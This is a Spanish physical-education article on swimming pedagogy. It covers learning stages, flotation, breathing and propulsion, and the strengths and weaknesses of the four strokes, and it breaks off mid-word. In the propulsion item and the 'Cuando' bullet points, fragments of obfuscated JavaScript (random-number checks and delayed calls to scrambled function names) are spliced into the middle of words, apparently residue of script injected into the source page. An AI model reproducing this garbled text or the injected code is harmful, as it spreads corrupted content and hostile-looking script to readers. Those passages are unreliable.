LA METODOLOGÍA DE LA NATACIÓN EN EDUCACIÓN FÍSICA

Autora: Carolina Nieto Muñoz

          Antes de llegar a ser nadador, el alumno ha de pasar por unas obligadas etapas. Cada una de ellas tiene ciertas características. Tenemos:

  • Etapa de Aprendizaje.
  • Etapa de Perfeccionamiento.
  • Etapa de Entrenamiento.

           Las dificultades que se encuentran en el aprendizaje de la natación conducen a adoptar una clasificación de estas tres categorías:

  1. Flotación: Ocupa un lugar primordial en la primera parte de la enseñanza. Mientras es insignificante al final del aprendizaje.
  2. Respiración: Ocupa la mitad del tiempo de la enseñanza en el primer ciclo.
  3. Propulsión: Ocupa un lugar más importante a medida que se va adentrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando en la etapa de perfeccionamiento y entrenamiento.

 

1)     ETAPA DE APRENDIZAJE:

          Esta etapa comprende desde que el alumno parte de cero hasta que resuelve las tres progresiones clásicas, que son: flotación, respiración y propulsión.

          El final de esta etapa consiste en nadar 50 metros, en una o dos pruebas. Su finalidad es que el niño sepa nadar.


         ¿Cuándo se puede decir que el niño sabe nadar?

  • Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando existe una completa familiarización con el agua.
  • Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando sabe respirar correctamente.
  • Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando realiza una distancia mínima de recorrido.
  • Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando sabe bucear.

           ¿Por qué estilo se debe iniciar el aprendizaje?

           Si el objetivo es llegar a la natación deportiva, se prefiere un estilo en el que se le dan brazadas y batidas alternativas.


           Si por el contrario se desea conseguir seguridad y resistencia se elige la braza.

          Cualquier estilo que se emplee al iniciar la enseñanza de la natación presenta unas cualidades positivas y otras negativas.


 

ESTILOS:

     BRAZA:

Aspectos Positivos:

-         Buenas posibilidades respiratorias.

-         Buenas posibilidades de orientación, vista y oído.

-         Estilo adecuado para la natación de fondo.

-         Fácil autocontrol del trabajo de los brazos.

-         Estilo que permite nadar largas distancias y adecuada también para bucear sin aletas.

-         Estilo que sirve para los salvamentos, por el movimiento de piernas.

-         Viraje sencillo.

Aspectos Negativos:

-         Batido de pierna difícil.

-         Dificultades de coordinación (brazos y piernas).

-         Se puede producir una posición de deslizamiento defectuoso.

-         Cabeza alta.

-         Es el estilo más lento.

     CROL:

Aspectos Positivos:

-         Batida de pierna fácil de aprender.

-         Los movimientos de los brazos y piernas pueden utilizarse para muchos juegos acuáticos.

-         Es el estilo más rápido.

-         Frecuentemente se produce la primera vivencia natatoria.

-         Buena posición hidradinámica.

-         Coordinación relativamente fácil de los movimientos de brazos y piernas.

-         Buen punto de partida para aprender otros estilos. Ejemplos espalda y mariposa.

Aspectos Negativos:

-         Altos requisitos de fuerza y condición física.

-         No es un estilo adecuado para niños.

-         Peores posibilidades de orientación (vista y oído).

-         Difícil aprendizaje de la brazada, combinada con una respiración correcta.

-         Proporción muy desequilibrada de la propulsión de los brazos respecto a la de las piernas.

-         Para un trabajo de brazos eficaz se requiere una buena movilidad de las articulaciones escapulares, apenas utilizable para los salvamentos.

-         Expiración en el agua.

     ESPALDA:

Aspectos Positivos:

-         Fácil aprendizaje del batido de piernas y movimiento de brazos.

-         Cara al aire y por tanto fácil respiración.

-         Coordinación de brazos, piernas sencillas.

-         Posición de relajación, es posible nadar con poca energía.

Aspectos Negativos:

-         Posibilidades de orientación muy malas, no se ve al frente, se oye mal.

-         No apto para nadar largas distancias.

-         Para avanzar requiere niveles de fuerzas y condición física realmente altos.

-         Estilo lento.

-         No utilizable en piscinas muy frecuentadas por el mal control visual, se produce fácilmente una posición hidrodinámica desfavorable, glúteos bajos.

-         Para un trabajo de brazos eficaz se requiere una buena movilidad de las articulaciones escapulares.

     MARIPOSA:

          El estilo mariposa requiere unos niveles de fuerza y de condición física tal altos que no resulta adecuado como estilo inicial de principiantes.

           Enseñar a nadar empez